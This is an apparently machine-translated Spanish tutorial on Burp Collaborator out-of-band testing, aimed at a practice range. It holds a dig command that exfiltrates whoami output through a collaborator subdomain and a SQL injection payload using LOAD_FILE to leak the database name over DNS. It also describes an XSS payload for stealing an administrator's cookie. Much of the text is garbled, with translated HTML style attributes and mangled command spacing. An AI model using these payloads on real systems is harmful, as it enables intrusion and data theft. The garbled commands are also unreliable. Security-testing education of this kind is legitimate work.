Herramienta de detección de aplicaciones fuera de banda de Burp Collaborator
La nueva versión lanzada actualmente por Burp está equipada con el módulo Burp Collaborator de forma predeterminada.
El modelo de colaborador Burp se refiere al modelo de ataque fuera de banda anterior.
Burp Collaborator tiene su propio nombre de dominio burpcollaborator.net, que es similar a la plataforma ceye y tiene un servidor DNS autorizado. Cuando los usuarios utilizan el módulo Colaborador, a cada usuario se le asignará un nombre de dominio de segundo nivel.
Burp Collaborator es solo un cliente. Podemos utilizar el servidor fuera de banda predeterminado configurado con Burp o nuestro propio servidor privado.
Configuración de Burp Partner
Puedes optar por utilizar la configuración predeterminada del servidor de comida para llevar o puedes configurar tu propio servidor de comida para llevar.
Haga clic para ejecutar la verificación de estado y comprobar si el servicio del servidor de entrega es normal.
Abre el cliente Colaborador.
Utilice el cliente
Utilice dig para consultar el nombre de dominio
ltpre class="MD-fences MD-end-block ty-contain-cm modelo cargado " revisión ortográfica = "falso" cid = "n53" tipo MD = "vallas" estilo = "tamaño de caja: cuadro de borde; desbordamiento: familia de fuentes: var (ancho de fuente: 0,9em); : bloque; interior roto: evitar; alineación de texto: izquierda; espacio en blanco: normal; imagen de fondo: heredado; tamaño de fondo: heredado; origen: heredado; Clip: Heredar; Color de fondo: RGB (248, 248, 248); Posición: Relativa. Borde: 1 px, RGB sólido (231, 234, 237); Margen - Inferior: 15px; bruto-superior: 15px; ancho: heredado; color: RGB (51, 51, 51); estilo de fuente: normal; -peso: 400; espacio entre letras: normal; huérfano: 2; sangría de texto: 0px transformación de texto: ninguna; espacio entre palabras: 0px - ancho de trazo de texto de WebKit: 0px; grosor: inicial; estilo de decoración de texto: inicial; color de decoración de texto: inicial; "lang="" gt; excava quién ami . 7 Jr 9 GK 6 gtn seis 33 jp 6181 Eu2 l8cw 1 . burpcollaborator . net lt; /pre gt;
Ver el registro devuelto por el cliente
Puedes ver que enviamos el comando whoami al servidor a través de dig para ver los registros DNS.
Utilice el campo de tiro proporcionado por Burp para presentarle cómo utilizar Burp Collaborator.
Cómo funciona
Burp Collaborator genera nombres de dominio únicos, los envía como cargas útiles a las aplicaciones y monitorea cualquier interacción con estos dominios. Si se observan solicitudes entrantes de una aplicación, se puede detectar la vulnerabilidad correspondiente.
Proceso de detección
Agregue el nombre de dominio obtenido por el cliente Burp Collaborator a la ubicación del Referer de la solicitud HTTP, espere unos segundos y luego haga clic en "Encuestar ahora" para ver el DNS y HTTP interactúan.
Estoy usando la galería de tiro de sqli para demostrar la inyección de DNSLog usando burp Collaborator.
Requisito previo: Secure_file_priv está vacío (si no está vacío, solo se pueden leer los archivos del directorio correspondiente).
seleccione 1, 2, LOAD_FILE(concat('\\\\',database(),'~','xwxb 0 b 0 bnpm 5 bnjbo 19 apeivpmvfj 4 . burpcollaborator . net \ \ a' ) -
En la carga útil xss, agregue el nombre de dominio generado por su propio colaborador de burp.
Espere a que el administrador verifique el comentario para activar la carga útil xss para obtener la cookie. /p>
Hay más usos, esperando tu descubrimiento